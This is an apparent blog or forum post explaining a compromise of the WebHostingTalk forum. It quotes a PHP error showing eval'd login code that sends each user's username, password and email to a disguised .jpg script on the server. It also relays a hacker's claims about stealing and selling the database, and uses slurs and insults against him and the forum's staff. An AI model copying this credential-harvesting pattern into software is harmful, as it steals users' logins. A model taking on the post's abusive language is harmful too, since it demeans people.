Normally, when I see someone post a thread that includes multiple sentence terminators in it’s subject, I believe that the thread starter is exaggerating the topic at hand. However, in this thread, it would appear that the poster is completely right. Only problem is, only a quarter of the forum’s user base understands why.

You see, the block of error message shows a very serious problem taking place on wht. A php script that’s masked as a .jpg file is being invisibly accessed by a php script on the server of wht, and it’s passing along three variables any time the user logs in: 1) The user’s username, 2) The user’s password, and 3) The user’s email address. After that, there isn’t a completely clear idea of what is being done with the data, but common sense tells me that the data is being sent out in an email to someone who is collecting wht accounts for some purpose.

How did it get there? Well, this is where it gets interesting. About a month ago, I was contacted by this fag who calls himself masteritx. This boring virgin who comes to the internet via a telephone line in some third world sandbox. This guy went on to tell me that he hacked wht, and to prove it he sent me an email from a webserver of wht’s, with the headers of the email clearly showing the email as being sent via a php script on a webserver of webhostingtalk. Every few weeks, he likes to contact me telling me he’s doing something new with the hack he put down on wht. What’s fucked up about it is, when he did tell inet about the vulnerabilities, he was registered, and those fucks actually banned him when they found out about the compromise. Real nice, ban the guy who offered to help you close a security hole. But, I’m not sure how masteritx went about it. He could have tried to extort them, and that could have triggered the ban, but I’m not really sure what happened. All I know is that he told me he was trying to reach wht’s admins, and a few days later he was banned. After that, he tried to tell me that he had obtained a copy of wht’s database, and that he was going to sell it to somebody.

Back to the technical specifics of the attack, the error that was posted on the thread is as follows:

Warning: fopen(http://www.webhostingtalk.com/store/images/126928744_lg.jpg?user=calamine&pass=xxxxxx&email=xxxxxx%40gmail.com): failed to open stream: HTTP request failed! HTTP/1.1 403 Forbidden in /includes/functions.php(2651) : eval()’d code(1) : eval()’d code on line 5

When the user logged in, the php script login.php calls a file under includes/function.php, and within that file is code which uses the php fopen function to download a file at http://webhostingtalk.com/store/images/126928744_lg.jpg while passing the username, password, and email address variables back down to the page. How did the 126928744_lg.jpg file get there? Well, my bet is that when the wiki was compromised, masteritx put in a few backdoors in directories he found were chmod 777, because those are directories that the webserver would be able to write to. With those backdoors, he probably wrote a php script, disguised it as a .jpg file which sends him an email with the variables the user sends when they login.

Currently, one admin has posted, Dennis. Dennis has posted to tell my friend and associate Steven that he should be posting elsewhere, and not “insulting” wht by posting information about the hack. I find inet’s disregard for user security a lot more insulting than what steven has posted. More information is probably going to come as the days go on, but the side of intelligence and security has been gaining support, with only a few idiots stepping in to defend wht’s admins.